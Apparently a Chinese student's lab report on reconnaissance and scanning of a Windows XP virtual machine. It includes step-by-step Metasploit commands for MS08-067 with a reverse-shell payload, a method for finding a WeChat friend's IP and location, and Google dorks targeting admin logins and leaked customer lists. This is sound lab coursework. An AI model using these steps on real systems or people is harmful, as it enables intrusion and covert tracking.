20232405 2024-2025-1 《网络与系统攻防技术》实验五实验报告

news/2025/11/16 16:49:31/文章来源:https://www.cnblogs.com/gaoyiming/p/19219843

1. 实验内容

  • (1)对任意一个DNS域名进行查询并获取一些信息

  • (2)查询任意社交媒体中好友的ip,并获取其所在地理位置

  • (3)使用nmap对靶机环境进行扫描并获取一些信息

  • (4)使用Nessus对靶机环境进行扫描并获取一些信息

  • (5)通过搜索引擎搜索自己在网上的足迹,判断自己是否有隐私泄露问题

  • (6)练习使用Google hack搜集技能完成搜索

2. 实践要求

  • (1)学会使用whois、dig、nslookup、traceroute等工具对DNS进行信息搜集

  • (2)学会获取联系人的ip和地理位置

  • (3)学会使用nmap、Nessus工具进行扫描获取信息

  • (4)熟练使用Google hack搜集技能进行搜索

3. 实践过程

3.1 对baidu.com进行查询并获取信息

  • 打开装有kali镜像的虚拟机,在shell中输入whois baidu.com,可以查找到该域名的注册人和联系方式。其中whois是用于查询域名、ip等网络资源注册信息的命令

image

  • 输入命令dig baidu.com查询该域名对应的一些ip,dig是用于DNS域名解析查询的命令,使用nslookup命令同样可以实现

image

  • 对这四个上述查到的ip地址使用whois命令可以得到该ip的注册人、其联系方式以及所在国家、城市和具体地理位置,以上述第一个ip为例,其地址位于北京市海淀区上地十街10号百度大厦

image

  • 在linux中使用traceroute baidu.com追踪到百度服务器的网络路径,中间路径没有显示的原因可能是因为这些节点配置了“禁止icmp回显”策略或者防火墙

image

  • 在win中使用tracert baidu.com追踪到百度服务器的网络路径

image

  • 使用UU在线工具对上述第一个ip(182.61.244.149)进行具体地理位置的查询

image

3.2 尝试获取微信好友的ip,并找到该好友的具体地理位置

3.2.1 获取ip

  • 获取微信好友的ip的方法有三种:路由器抓包,wireshark抓包,资源监视器。本实验中使用资源监视器方法,打开资源监视器,并给微信好友发送信息,在资源监视器中可以看到该进程的目的ip

image

3.2.2 查询地址

  • 使用查询工具查询该ip地址,发现这一IP所在地址与实际一致

image

3.3 使用nmap开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

  • 本实验中攻击机使用kali,靶机使用winXP,先获取一下双方的ip,并实现以下操作

  • 在kali中使用ifconfig查看攻击机ip:192.168.217.133

image

  • 在winXP中使用ipconfig查看靶机ip:192.168.217.147

image

3.3.1 靶机IP地址是否活跃

  • 在kali中使用命令nmap -sn 192.168.217.0/24,不扫描端口去确认192.168.217.0/24网段中哪些主机正在运行且网络可达,其中-sn是不扫描端口的选项参数。结果发现攻击机和靶机ip都存活

image

3.3.2 靶机开放了哪些TCP和UDP端口

  • 在扫描之前建议先关闭靶机中的防火墙,不然会扫描很长时间(本人亲自尝试过)

image

  • 在kali中使用命令nmap -sT -sU -p- 192.168.217.147扫描所有开放的tcp和udp端口,其中-sT是tcp全连接扫描,-sU是udp端口扫描,-p-是扫描所有端口选项。结果发现开放的tcp有135/139/445,开放的udp有123/137,下面还有一些开放或者被过滤的端口

image

3.3.3 靶机安装了什么操作系统,版本是多少

  • 在kali中使用命令nmap -O 192.168.217.147识别操作系统类型,其中-O是操作系统探测选项。结果显示操作系统是Microsoft Windows XP SP2 or SP3

image

3.3.4 靶机上安装了哪些服务

  • 上面探测操作系统的时候就会显示有哪些服务,但是没有版本号,所以在kali中使用命令nmap -sV 192.168.217.147进行服务版本识别,其中-sV是服务版本探测选项。结果发现服务有:
    135端口的msrpc(远程过程调用服务)版本是Microsoft Windows RPC
    139端口的netbios-ssn(NetBIOS会话服务)版本是Microsoft Windows netbios-ssn
    445端口的microsoft-ds(SMB文件共享服务)版本是Microsoft Windows XP microsoft-ds

image

3.4 使用Nessus开源软件对靶机环境进行扫描,回答以下问题并给出操作命令

  • 首先根据参考资料中安装nessus的教程在kali中完成安装

image

3.4.1 靶机上开放了哪些端口

  • 首先点击主页右上角new scan,之后选择host discovery

image

  • 按下图进行扫描配置,target输入靶机ip,save之后开始扫描即可

image

  • 扫描结果显示靶机开放的端口有:135、139、445

image

3.4.2 靶机各个端口上网络服务存在哪些安全漏洞(列举高危漏洞)

  • 点击主页右上角new scan,之后选择advanced scan,并进行与上述相同的ip配置,扫描后结果如下

image

  • 其中有个高危漏洞,内容是靶机运行的winXP系统已经停止被官方支持,不再推送安全补丁,存在大量未修复漏洞

image

  • 还有445端口的SMB/RPC服务如下图,存在MS09-001、MS08-067、MS17-010(永恒之蓝)漏洞

image

image

image

image

3.4.3 如何攻陷靶机环境,以获得系统访问权

  • (1)打开kali终端,输入msfconsole启动metasploit框架。待界面加载完成后,输入search ms08-067搜索该漏洞的攻击模块,会找到exploit/windows/smb/ms08_067_netapi模块

  • (2)输入use exploit/windows/smb/ms08_067_netapi,加载模块。
    输入set RHOSTS 192.168.217.147,设置靶机ip。
    输入set PAYLOAD windows/meterpreter/reverse_tcp,配置攻击载荷以获取反弹shell。
    输入ifconfig查看kali自身的ip,再输入set LHOST 192.168.217.133(攻击机ip),设置kali用于接收反弹shell的ip。

  • (3)输入exploit执行攻击。若攻击成功,会获得meterpreter shell,此时即获取靶机的系统级权限,之后可以进行一些系统操作验证。

3.5 通过搜索引擎搜索自己在网上的足迹

  • 通过浏览器搜索自己的学号20232405,发现有自己在博客园发布的作业

image

  • 通过浏览器搜索自己的名字,没有和本人相关的信息

image

3.6 使用10种Google hack搜集技能完成搜索

  • (1)关键词搜索。使用site:baidu.com 管理员登录搜索百度中包含“管理员登录”的页面,找到后台登录入口

image

  • (2)文件类型搜索。使用filetype:xlsx "客户名单"查找目标网站泄露的客户名单Excel文件

image

  • (3)url关键词搜索。使用inurl:admin login site:baidu.com搜索百度下URL含“admin”且页面含“login”的后台登录页

image

  • (4)标题关键词搜索。使用intitle:登录 intitle:管理员 site:gov.cn用于搜索政府网站中标题含“登录”和“管理员”的页面

image

  • (5)页面内容关键词搜索。使用intext:"debug mode"查找目标网站中含“debug mode”的页面

image

  • (6)与目标域名相关联网站的搜索。使用related:baidu.com搜索与百度相关的网站

image

  • (7)缓存页面搜索。使用cache:baidu.com/admin/login.php查看目标后台登录页的 Google 缓存版本

image

  • (8)关联链接搜索。使用link:https://www.cnblogs.com用于查找所有指向博客园官网的关联网页

image

  • (9)相关信息搜索。使用info:http://www.baidu.com得到百度的信息

image

  • (10)端口搜索。使用port:3389 site:baidu.com查找百度开放的3389端口

image

4. 问题及解决方案

  • 问题一:在进行tcp/udp开放端口扫描的时候,需要的时间非常长,并且结果也不对

image

  • 解决一:通过查找资料发现,需要先关闭一下靶机上的防火墙再扫描才会正常

5. 学习感悟、思考

本次实验围绕网络信息搜集与漏洞扫描、渗透测试技能展开,包含域名与ip信息搜集、获取好友IP与地理位置、nmap靶机扫描、nessus漏洞扫描、网络足迹搜索与Google Hack练习。在完成本次针对winXP靶机的漏洞扫描与渗透测试实验后,我对网络安全攻防的理解有了更深刻的体会。从nessus的安装、配置到最终利用 metasploit攻陷靶机,每一步都充满了技术的严谨性与探索的趣味性。
此外,我也意识到个人隐私保护的重要性。一些来历不明的网站等信息都可能会使我们的隐私泄露,造成不可挽回的严重后果。通过这个实验,加深了我对自己隐私保护的注意,同时也会提醒周围人防范于未然。
整个实验过程,是理论知识与实践操作的深度结合,让我从被动的知识接受者转变为主动的技术探索者。我不仅掌握了nessus的使用技巧,更重要的是培养了网络安全思维,学会从攻击者和防御者的双重角度去思考问题,这对我今后在网络安全领域的学习和实践都具有重要的指导意义。

参考资料

VMware17pro虚拟机安装Windows XP教程(超详细)
kali-linux中安装Nessus详细教程

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/967190.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Invicti v25.11 发布,新增功能简介

Invicti v25.11 发布,新增功能简介Invicti v25.11 发布,新增功能简介 Invicti v25.11.0 for Windows - Web 应用程序安全测试 Invicti (formerly Netsparker) | Web Application and API Security for Enterprise 请…

Acunetix v25.11 发布,新增功能简介

Acunetix v25.11 发布,新增功能简介Acunetix v25.11 发布,新增功能简介 Acunetix v25.11.0 (Linux, Windows) - Web 应用程序安全测试 Acunetix | Web Application Security Scanner 请访问原文链接:https://sysin.…

【运维自动化-标准运维】变量的高级用法

在全局变量使用篇里了解到了各类变量的基本用法,实际在很多场景下,需要对变量进行处理,这就是标准运维里变量的高级用法。只要处理变量符合python语法,在一行代码语句的长度内可以执行的代码,系统均是可以进行渲染…

MySQL数据过滤与计算字段实战技术指南

MySQL数据过滤与计算字段实战技术指南一、数据过滤进阶:多条件组合与高效筛选 在MySQL数据检索中,精准过滤数据是提升查询效率与结果有效性的核心环节。通过组合WHERE子句及专用操作符,可实现复杂业务场景下的数据筛…

2025-11-14 PQ v.Next日志记录

2025-11-14 PQ v.Next日志记录 在李剑老师的帮助下,PQ v1.1.9版本目前已上线,因此需要重新更新一下用户使用手册。 https://z.gitee.cn/zgca/projects/777586/repos/zgca/aipq/sources今日进度(4*4):基于最新版本…

详细介绍:K8s 安全机制全解析

详细介绍:K8s 安全机制全解析pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco"…

详细介绍:MySQL索引指南

详细介绍:MySQL索引指南pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", &q…

实用指南:【第五章:计算机视觉-项目实战之推荐/广告系统】1.推荐系统基础与召回算法-(6)召回算法之u2i: FM、deepFM、召回双塔原理精讲与实战

实用指南:【第五章:计算机视觉-项目实战之推荐/广告系统】1.推荐系统基础与召回算法-(6)召回算法之u2i: FM、deepFM、召回双塔原理精讲与实战2025-11-16 16:34 tlnshuju 阅读(0) 评论(0) 收藏 举报pre { white-sp…

微前端架构演进:决策、实践与协同

第一部分:引入微前端的决策过程 1. 业务与团队背景: OMNIEYE平台并非一开始就采用微前端。它最初是一个单体Vue 2应用。随着业务飞速发展,我们面临了典型的“前端巨石应用”问题:团队协作瓶颈:多个功能团队(数据…

OI 技术动作 注意事项集合

OI 技术动作 & 注意事项集合 底板:NOIP 注意事项梳理 by Cindy_Li 2024.11 参考:OI 赛制比赛 emergency kit by Qingyu 感谢 @R_shuffle @fnoihzhyan 提供大量建设性意见。 本文可能不够详细,但写的都是笔者认为…

Java 设计模式—— 责任链模式:从原理到 SpringBoot 最优搭建

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

大模型基础补全计划(七)---Transformer(多头注意力、自注意力、位置编码)及实例与测试

大模型基础补全计划(七)---Transformer(多头注意力、自注意力、位置编码)及实例与测试PS:要转载请注明出处,本人版权所有。 PS: 这个只是基于《我自己》的理解, 如果和你的原则及想法相冲突,请谅解,勿喷。环境说明…

京东商品详情接口终极突破:从多接口联动解析到数据全息重构

京东商品详情接口长期以来以 “数据碎片化、签名动态化、反爬层叠化” 著称,常规采集方案往往因单一接口依赖导致数据缺失或请求封禁。本文跳出 “单接口模拟” 的固化思维,通过逆向商品详情页的完整数据链路,实现 …

实用指南:On-Page SEO完全指南:从关键词策略到内容优化

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

2025年品质卓越的羊毛地毯品牌综合推荐与选购指南

摘要 随着家居品质需求的不断提升,2025年羊毛地毯行业迎来新一轮消费升级。现代消费者不仅关注产品美观度,更重视环保属性、工艺水准与文化内涵。据统计,中国高端手工地毯市场规模较去年增长23.6%,其中天然植物染色…

2025年品质卓越的羊毛地毯工厂综合推荐与选择指南

摘要 随着家居装饰行业的消费升级,手工羊毛地毯市场在2025年迎来新一轮增长期。消费者对地毯的品质、环保性和设计美感要求显著提升,推动行业向高端化、个性化方向发展。本文基于市场调研和用户口碑,为您精选十家品…

20232415 2025-2026-1 《网络与系统攻防技术》 实验五实验报告

一、实验内容 1.1DNS 域名与 IP 关联信息搜集:从指定 3 个域名中任选其一,运用 whois、dig、nslookup、traceroute、tracert 及在线工具,获取 DNS 注册人及联系方式、域名对应 IP 地址、IP 注册人及联系方式、IP 所…

CSP2025反思——于诗涵

2025CSP反思——于诗涵 通过本次比赛,让我对自己的不足有了更加深刻的了解,总结出了以下几点: J组:100+100+45+64=309 1.对比去年的成绩,我有了显著的提升,也吸取了去年因为打错变量等各种原因在简单题上丢了很多…

接雨水算法全解析:从错误到3种最优解法(含扩展与思路Trigger)

接雨水算法全解析:从错误到3种最优解法(含扩展与思路Trigger)接雨水问题是数组类算法的经典“拦路虎”——既考察对“凹陷容量计算”的本质理解,又要求灵活运用单调栈、双指针等数据结构/技巧。本文将从最常见的错…